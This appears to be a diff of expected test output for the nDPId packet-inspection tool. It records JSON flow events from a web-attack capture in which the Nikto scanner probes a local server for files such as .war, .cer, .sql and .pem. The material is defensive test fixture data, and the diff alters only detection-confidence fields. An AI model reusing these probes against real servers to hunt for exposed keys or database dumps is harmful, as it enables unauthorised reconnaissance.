00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276858,"pkt":"AAAAAAAAAAAAAAAACABFAADB2xVAAEAGYR9\/AAABfwAAAcJ4H5D77OMujr7QhoAYAED+tQAAAQEICp1m+6KdZvuiR0VUIC8xMjcwMC53YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276859,"pkt":"AAAAAAAAAAAAAAAACABFAADApHlAAEAGl7x\/AAABfwAAAcJ6H5CcwpxJV58CXYAYAED+tAAAAQEICp1m+6OdZvujR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276859,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276860,"pkt":"AAAAAAAAAAAAAAAACABFAADALy9AAEAGDQd\/AAABfwAAAcJ8H5ChphcTD1c5UYAYAED+tAAAAQEICp1m+6SdZvukR0VUIC8xMjcwLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276862,"pkt":"AAAAAAAAAAAAAAAACABFAAC9dyVAAEAGxRN\/AAABfwAAAcJ+H5ApDE8dFFMQVIAYAED+sQAAAQEICp1m+6WdZvulR0VUIC8xLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276863,"pkt":"AAAAAAAAAAAAAAAACABFAAC9pJxAAEAGl5x\/AAABfwAAAcKAH5APfJymg2qZ5YAYAED+sQAAAQEICp1m+6edZvumR0VUIC8xLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276864,"pkt":"AAAAAAAAAAAAAAAACABFAADBqoBAAEAGkbR\/AAABfwAAAcKCH5Cxx5I\/tyTjW4AYAED+tQAAAQEICp1m+6idZvuoR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276865,"pkt":"AAAAAAAAAAAAAAAACABFAADBsWVAAEAGis9\/AAABfwAAAcKEH5CGGYkkbARgroAYAED+tQAAAQEICp1m+6mdZvupR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276866,"pkt":"AAAAAAAAAAAAAAAACABFAADBsTlAAEAGivt\/AAABfwAAAcKGH5CzxIl4Ool\/aIAYAED+tQAAAQEICp1m+6qdZvuqR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
